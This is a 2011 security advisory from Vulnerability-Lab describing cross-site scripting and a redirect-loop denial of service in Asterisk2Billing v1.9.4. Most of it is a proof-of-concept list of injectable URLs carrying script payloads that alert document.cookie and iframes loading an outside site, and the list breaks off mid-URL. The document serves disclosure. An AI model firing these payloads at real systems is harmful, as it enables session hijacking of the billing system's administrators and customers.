Document Title: =============== Asterisk2Billing v1.9.4 - Multiple Web Vulnerabilities Release Date: ============= 2011-08-10 Vulnerability Laboratory ID (VL-ID): ==================================== 5 Abstract Advisory Information: ============================== The Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on Asterisk 2 Billing Phone System. Vulnerability Disclosure Timeline: ================================== 2011-08-11: Discovery by Vulnerability-Lab Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ 1.1 Multiple Input Validation Vulnerabilities are detected on A2B(persistent). A remote attacker can include persistent malicious script codes to hijack customer sessions or manipulate application requests. 1.2 Multiple Input Validation Vulnerabilities are detected on A2B(non-persistent).A remote attacker can form malicious cross site requests to manipualte a admin/customer on client-side(browser). 1.3 This Vulnerability can be used as Denial of Service its a redirection Loop what never ends. When running application is frozen. Path: /a2b_admin/Public/ File: CC_upload.php Para: ?section=11&acc= Proof of Concept (PoC): ======================= The Vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... 1.1 Vulnerable Modules (Persistent) ... Admin-Area: A2B_entity_subscriber.php CC_support.php A2B_entity_agent.php A2B_entity_config.php Agent-Area: A2B_entity_card.php A2B_entity_friend.php A2B_entity_card.php A2B_entity_def_ratecard.php User-Area: A2B_notification.php A2B_entity_phonebook.php A2B_entity_card.php 1.2 Vulnerable Parameter (Non-Persistent) ... Admin-Area https://demo.xxx.com/a2b/admin/Public/A2B_entity_card.php?form_action=ask-add&atmenu=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_server.php?form_action=ask-edit&id=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_config.php?atmenu=document&stitle=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_package_group.php?form_action=ask-delete&id=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_friend.php?atmenu=iax&stitle=Document&wh=AC&id=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 http://demo.xxx.com/a2b_admin/Public/A2B_entity_friend.php?atmenu=%3E%22%3Ciframe%20src=http://global-evolution.info%20width=800%20height=800%3E§ion=1 https://demo.xxx.com/a2b/admin/Public/A2B_entity_config.php?form_action=list&atmenu=config&stitle=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/CC_support.php?atmenu=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_agent.php?popup_select=1&popup_formname=form&popup_fieldname=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 https://demo.xxx.com/a2b/admin/Public/A2B_entity_subscriber.php?section=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 http://demo.xxx.com/a2b_admin/Public/CC_support.php?form_action=ask-delete&id=%3E%22%3Ciframe%20src=http://global-evolution.info%20width=800%20height=600%3E http://demo.xxx.com/a2b_admin/Public/A2B_entity_tariffplan.php?atmenu=tariffplan§ion=%3E%22%3Ciframe%20src=http://global-evolution.info%20width=800%20height=600%3E http://demo.xxx.com/a2b_admin/Public/A2B_entity_user.php?atmenu=user&groupID=%3E%22%3Ciframe%20src=http://global-evolution.info%20width=800%20height=800%3E§ion=3 Agent-Area http://demo.xxx.com/a2b_agent/Public/A2B_entity_card.php?form_action=ask-edit&id=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 http://demo.xxx.com/a2b_agent/Public/A2B_ticket_view.php?id=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 http://demo.xxx.com/a2b_agent/Public/A2B_entity_friend.php?section=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 http://demo.xxx.com/a2b_agent/Public/A2B_entity_def_ratecard.php?cancelsearch=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221 User-Area https://demo.xxx.com/A2B_entity_speeddial.php?form_action=ask-delete&id=%3E%22%3Ciframe%20src=http://global-evolution.info%20width=800%20height=800%3E https://demo.xxx.com/A2B_notification.php?form_action=>"